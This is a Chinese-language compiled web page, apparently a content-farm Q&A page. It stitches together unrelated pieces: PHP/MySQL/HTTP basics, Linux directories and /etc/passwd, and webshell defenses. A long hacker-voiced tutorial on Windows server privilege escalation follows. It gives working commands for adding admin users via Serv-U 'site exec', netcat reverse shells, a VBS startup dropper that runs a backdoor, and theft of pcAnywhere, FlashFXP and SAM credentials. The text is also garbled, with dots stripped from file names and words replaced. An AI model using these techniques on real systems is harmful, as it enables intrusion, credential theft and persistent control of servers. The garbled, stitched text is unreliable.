求制作安卓手机的一个脚本语言制作
需要“PHP语言程序、MySQL数据库、计算机中国络通讯、及HTTP/XML/CSS/JS等基础”PHPPHP,一个嵌套的缩写名称,是英文超级文本预处理语言的缩写
PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的中国站编程人员广泛的运用
PHP独特的语法混合了C、Java、Perl以及PHP自创新的语法
它可以比CGI或者Perl更快速的执行动态中国页
二
MySQL一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle旗下公司
MySQL最流行的关系型数据库管理系统,在WEB应用方面MySQL是最好的RDBMS(RelationalDatabaseManagementSystem,关系数据库管理系统)应用软件之一
MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性
MySQL所使用的SQL语言是用于访问数据库的最常用标准化语言
MySQL软件采用了双授权政策(本词条"授权政策"),它分为社区版和商业版,由于其体积小、速度快、总体拥有成本低,尤其是开放源码这一特点,一般中小型中国站的开发都选择MySQL作为中国站数据库
由于其社区版的性能卓越,搭配PHP和Apache可组成良好的开发环境
三
HTTP超文本传送协议(HTTP-Hypertexttransferprotocol)定义了浏览器(即万维中国客户进程)怎样向万维中国服务器请求万维中国文档,以及服务器怎样把文档传送给浏览器
从层次的角度看,HTTP是面向(transaction-oriented)应用层协议,它是万维中国上能够可靠地交换文件(包括文本、声音、图像等各种多媒体文件)的重要基础
linux根目录结构?
结构说明如下:
/boot:开始启动过程所需的文件。
/:home用户家目录。/etc:配置文件大多数是文本文件。
/sys:也是一个伪文件系统:跟硬件设备相关的属性映射文件。
/opt:可选的目录。
/tmp:临时文件。/mnt:临时挂载文件系统。/root:用户的个人目录。
/bin:存储的是可执行命令。普通单用户
/sbin:存储的是管理命令。/bin、/sbin、/lib、/etc:这几个文件具有一定的相关性,每个文件和其它的文件都有一定的关联性。
/dev:该文件夹中存放的都是一些关于设备的文件,例如光驱、硬盘、U盘、以及一些IDE(hd开头)和SATA(sd开头)、SCSI(sd开头)、USB(sd开头)相关的文件。供系统用于访问硬件。
/proc:伪文件系统,该文件夹中的文件在系统启动之前是空的。存储的很多都是一些内核的镜像文件。
/var:可变化的文件。日志,邮件文件。
/media:移动挂载点,一些可热插拔介质。/opt:手工挂载设备的挂载点。可选的应用程序包目录。
/usr:只读用户数据次要层次,包含大部分多用户功能和应用。文件,/usr/bin、/usr/sbin、/usr/lib:系统启动后为了一些功能而使用的命令。/usr/local/bin、/usr/local/sbin、/usr/local/lib:存储的是当前系统启动后的第三方软件需要用到的一些可执行文件和库文件。
/run:自上一次系统启动以来启动的进程的运行时数据。这包括ID文件和锁定文件等等。此目录中的内容在重启时重新创建。
Linux中在当前用户(root用户)用户主目录下创建一目录(new)?
1、首先查看当前的路径,输入pwd,回车。
2、如果当前目录不是root的用户目录,则需要进入root用户目录,输入:cd/root,回车,进入root用户目录。
3、新建目录new,输入命令:mkdirnew,回车,即可成功创建new目录。
4、查看当前目录下的所有文件,输入命令:ll,回车。可以看到new目录已经存在。
扩展资料:
Linux存放用户密码信息的目录是什么?
用户帐号/etc/passwd用户密码/etc/shadow可以查看下用户密码信息文件都放了什么。#vi/etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:/sbin/nologin每一行内容存放一个用户的信息,每个用户信息有7部分组成root:x:0:0:root:/root:/bin/bashroot用户名用户登录系统时使用的用户名x密码密码位2UID用户标识号2GID缺省组标识root注释性描述例如存放用户全名等信息/root宿主目录用户登录系统后的缺省目录/bin/bash命令解释器用户使用的Shell,默认为bashUID关于上面的UID这里细说一下,其实决定用户是什么权限,是由UID号决定的。linux用户分为三种:超级用户:(rootUID=0)普通用户:(UID500~60000)伪用户:(UID1~499)所以,可以修改用户的UID号来修改用户的类型,如果把root的UID号为500,那么root就变成了普通用户,如果把fnngj用户的UID改为0,那么它就拥有了root用户的超能力。#vi/etc/passwd进入之后修改,完了保存退出就OK了。伪用户说到用户种类,又牵扯到一个伪用户,那么伪用户是干什么用的?1、伪用户与系统和程序服务相关。bin、daemon、shutdown、halt等,任何Linux系统默认都有这些伪用户。mail、news、games、apache、ftp、mysql及sshd等,与linux系统的进程相关。2、伪用户通常不需要或无法登录系统。3、可以没有宿主目录。
怎么查自己linuxroot账号的密码?
linux下用户可以被查看到,但是密码都是加密的,无法被查看到的。
1、查看所有用户的方法:cat/etc/passwd且能看到用户和组的id、家目录以及使用壳。
2、查看当前登录用户:who3、所有用户密码都是加密的,无法被查看到,包括自己的用户。只有知道原密码才能更改密码或者登录
root密码是什么?
oot密码是指windows的管理员密码,ssh服务是远程接入服务。
ROOT存在于Linux系统、UNIX系统(如AIX、BSD等)和类UNIX系统(如Debian、Redhat、Ubuntu等版本的Linux系统以及Android系统)中,是系统中唯一的超级用户,相当于Windows系统中的administrator用户。其具有系统中所有的权限,如启动或停止一个进程,删除或增加用户,增加或者禁用硬件等等。
现代操作系统一般属于多用户的操作系统,也就是说,同一台机器可以为多个用户建立各自的账户。允许拥有这些账户的用户同时登录这台计算机,这就涉及到计算机用户和资源的管理,GNU/Linux/Android的root帐号具有系统的所有权限,root密码的泄漏会导致整台计算机被完全地非法控制,所以root帐号在服务器上以及重要机器上是不允许直接使用的。取而代之的是管理员使用普通帐号,在必要时使用su提权。
root用户所在的组称为root组。“组”是具有相似权限的多个用户的集合。
需要注意的是,root用户是系统中唯一的超级管理员,它具有等同于操作系统的权限。适当的使用是可以利用一些需要root权限的应用,譬如广告阻挡。可是root是比windows的系统管理员的能力是更大,足以把整个系统的大部分文件删掉,导致系统完全无法再使用。所以,如果用root进行了不当的操作是很危险的。轻微的是可以当机,严重甚至可以不能开机。所以,在Unix、Linux或Android中,除非确实需要,一般情况下不推荐使用root。最好单独建立一个普通的用户,作为日常之用。
不推荐使用root的另一个原因则是出于安全的考虑。root具有系统的所有权限,root密码的不小心泄漏,足以导致整台计算机完全被窃取root密码的人所控制,这台计算机上的任何用户的任何数据,都会赤裸在root的目光之下。
有些任务必须由root才能执行,例如删除系统内置应用程序。但Unix或Linux又推荐尽量不要使用,这构成了一个矛盾。于是产生了一个sudo的做法。即,把系统管理的一部分权限授予普通用户,并且只有在这些用户需要的时候,才允许这些用户暂时执行这些系统管理的命令。
root的根目录(/root)在默认情况下其他用户是无权访问的。这在一定程度上增强了整个系统的安全性,但不完全是
什么是webshell?有什么危害?
webshell 就是一种可以在web服务器上执行的后台脚本或者命令执行环境。
黑客通过入侵网站上传webshell后获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。
Webshell攻击的特点有哪些?
1
持续远程访问
入侵者可以利用 webshell 从而达到长期控制网站服务器的目的。若攻击者自行修复了漏洞,以确保没有其他人会利用该漏洞,攻击者可以低调的随时控制服务器。一些流行的 webshell 使用密码验证和其他技术来确保只有上传 webshell 的攻击者才能访问它。
2
权限提升
在服务器没有配置错误的情况下, webshell 将在web服务器的用户权限下运行,该用户权限是有限的。通过使用 webshell ,攻击者可以尝试通过利用系统上的本地漏洞来执行权限提升,常见的有查找敏感配置文件、通过内核漏洞提权、利用低权限用户目录下可被Root权限用户调用的脚本提权、任务计划等。
3
极强的隐蔽性
有些恶意网页脚本可以嵌套在正常网页中运行,且不容易被查杀。webshell还可以穿越服务器防火墙,由于与被控制的服务器或远程主机交互的数据都是通过80端口传递,因此不会被防火墙拦截,在没有记录流量的情况下, webshell 使用post包发送,也不会被记录在系统日志中,只会在web日志中记录一些数据提交的记录。
获取webshell的常见方法
1
直接上传获得webshell
因过滤上传文件不严,导致用户可以直接上传 webshell 到网站任意可写目录中,从而拿到网站的管理员控制权限。
2
添加修改上传类型
现在很多脚本程序上传模块不是只允许上传合法文件类型,大多数的系统是允许添加上传类型。
3
利用后台管理功能写入webshell
进入后台后还可以通过修改相关文件来写入webshell。
4
利用后台数据库备份及恢复获得
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell。
5
php+mysql系统
后台需要有mysql数据查询功能,入侵者就可以利用它执行SELECT in TO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的WebShell代码插入mysql在利用SELECT in TO OUTFILE语句导出shell。
webshell网站后门的清除方法
后门的文件可以直接删除,找到后门文件,直接删除即可;
不能直接删除后门文件,只能删除文件内容中的木马代码进行清除。
1、文件名为indexasp 、indexphp,这类为自动生成SEO类型文件,可以直接删除,如要彻底清除后门,需找生成此文件的源文件。
2、文件内容只有一行,或很少量的代码,此类被称为“一句话后门”。
3、文件内容中存在password或UserPass关键字。
4、另外一些在上传组件目录或上传目录的文件可以直接删除。如eWebEditor、Editor、FCKeditor、webeditor、UploadFiles、uploads等。
1、网站自身文件被插入恶意代码
2、网站配置文件
这类插入网站自身代码中的后门清除方法:
首先备份此文件以备改错可恢复,查找到后门代码的位置,一般通过查找“eval、execute、request、ExecuteGlobal”关键字进行定位。把确定为后门的代码删除后保存文件。访问网站看是否报错,以确认有没有改错。
网站如何防御webshell攻击?
从根本上解决动态网页脚本的安全问题,要做到防注入、防暴库、防COOKIES欺骗、防跨站攻击等等,务必配置好服务器FSO权限。
1、建议用户通过ftp来上传、维护网页,尽量不安装上传程序。
2、对上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
3、程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载程序,要对数据库名称和存放路径进行修改,数据库名称要有一定复杂性。
5、尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再上传。
8、时常备份数据库等重要文件。
9、日常多维护,并注意空间中是否有来历不明的asp文件。
10、尽量关闭网站搜索功能,利用外部搜索工具,以防爆出数据。
11、利用白名单上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。
关于提权的方法太多,偶逃了两节课整理出下面几点偶辅导员不会看到了吧
一:利用serv-u本地提权使用最频繁所有提权中成功率最高
工具ftpexe
c:\winnt\system32\inetsrv\data\
C:\Documents and Settings\All Users\Documents
站点根目录
二:修改d:\Program Files\serv-u目录下的ServUDaemonini来提权
[USER=angel|1]
Password=ng98F85379EA68DBF97BAADCA99B69B805
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=
用户是angel 密码是 111111
在本地cmd上进行ftp命令
c:\>ftp ip
ftp>quote site exec net user 123$ 123456 /add
ftp>quote site exec net localgroup administrators 123$ /add
再在站点根目录上传ncexe进行反向连接
ftp>quote site exec d:\wwwroot\bbs\nc 自己ip 2005 >> nc -e cmdexe (此时用nc再监听一个端口nc -l -p 2005)
三:通过数据库连接文件获取数据库账号密码提升权限
编辑在根目录下查找文件connasp
查找sqlUsername 和 sqlPassword
用sqltools连接
四:通过写脚本到启动项目
C:\Documents and Settings\All Users\开始\程序\启动\
五:通过pcanywhere提权
账号密码存放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
下载cif结尾的文件然后破解上去以后直接
webshell提权补充 - -
话说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载cif本地
破解就使用pcanywhere连接就ok了
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemonini把他下载
下来,然后在本机上安装一个servu把ServUDaemonini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemonini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip
220 Serv-U FTP Server v5004 for WinSock ready
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password
Password:password //密码
230 User logged in, proceed
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec netexe user rover rover1234 /add //利用系统的netexe
文件加用户。
如果提示没有权限,那我们就
把后门(serverexe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscriptshell")
a=wshshellrun ("cmdexe /c net user user pass /add",0)
b=wshshellrun ("cmdexe /c net localgroup Administrators user /add",0)
b=wshshellrun ("cmdexe /c serverexe",0)
存为xxvbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的serverexe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本
接下来就是等了等他登陆
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦~~嘻嘻~
唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp星号密码 查看器查看,然后和Sitesdat中加密了密码做比较发现并未加密而是查到的密码是明文显示, 然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sitesdat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。
第六
WIN2K+IIS50默认情况下应用程序保护选项是"中(共用的)",这时IIS加载isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idqdll
2、 httpextdll
3、 httpodbcdll
4、 ssincdll
5、 msw3prtdll
6、 authordll
7、 admindll
8、 shtmldll
9、 sspifiltdll
10、compfiltdll
11、pwsdatadll
12、md5filtdll
13、fpexedlldll
所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug,比如请求/scripts/test%81%5cssincdll也将会认为是请求的ssincdll,就是分离文件路径的时候没有考虑到双字节的 远东版问题。ssincdll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个 "/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限 漏洞,这种漏洞很多别的地方( php、asp等)也还存在。
加载这些isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:
1、 idqdll d:\winnt\system32\idqdll
2、 httpextdll d:\winnt\system32\inetsrv\httpextdll
3、 httpodbcdll d:\winnt\system32\inetsrv\httpodbcdll
4、 ssincdll d:\winnt\system32\inrtsrv\ssincdll
5、 msw3prtdll d:\winnt\system32\msw3prtdll
6、 authordll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\authordll
7、 admindll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admindll
8、 shtmldll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtmldll
9、 sspifiltdll d:\winnt\system32\inetsrv\sspifiltdll
10、compfiltdll d:\winnt\system32\inetsrv\compfiltdll
11、pwsdatadll d:\winnt\system32\inetsrv\pwsdatadll
12、md5filtdll d:\winnt\system32\inetsrv\md5filtdll
13、fpexedlldll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedlldll
正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以提升权限了
可以把ISAPIHackdll上传到IIS的可执行目录,文件名可叫ssincdll或者admindll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了
第七
下载系统的 %windir%\repair\sam(WinNT 4下是sam_ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
第八
PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 第九
Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为suexe 文件就放在C:\Documents and Settings\All Users\ Documents, 然后我们用suexe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-uexe "cmd"
>USER xl
>PASS 111111
反弹shell: serv-uexe "ncexe -l -p 99 -e cmdexe"
渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。
专业服务
渗透测试有时是作为外部审查的一部分而进行的。这种测试需要探查系统,以发现操作系统和任何网络服务,并检查这些网络服务有无漏洞。你可以用漏洞扫描器完成这些任务,但往往专业人士用的是不同的工具,而且他们比较熟悉这类替代性工具。
渗透测试的作用一方面在于,解释所用工具在探查过程中所得到的结果。只要手头有漏洞扫描器,谁都可以利用这种工具探查防火墙或者是网络的某些部分。但很少有人能全面地了解漏洞扫描器得到的结果,更别提另外进行测试,并证实漏洞扫描器所得报告的准确性了。
0条评论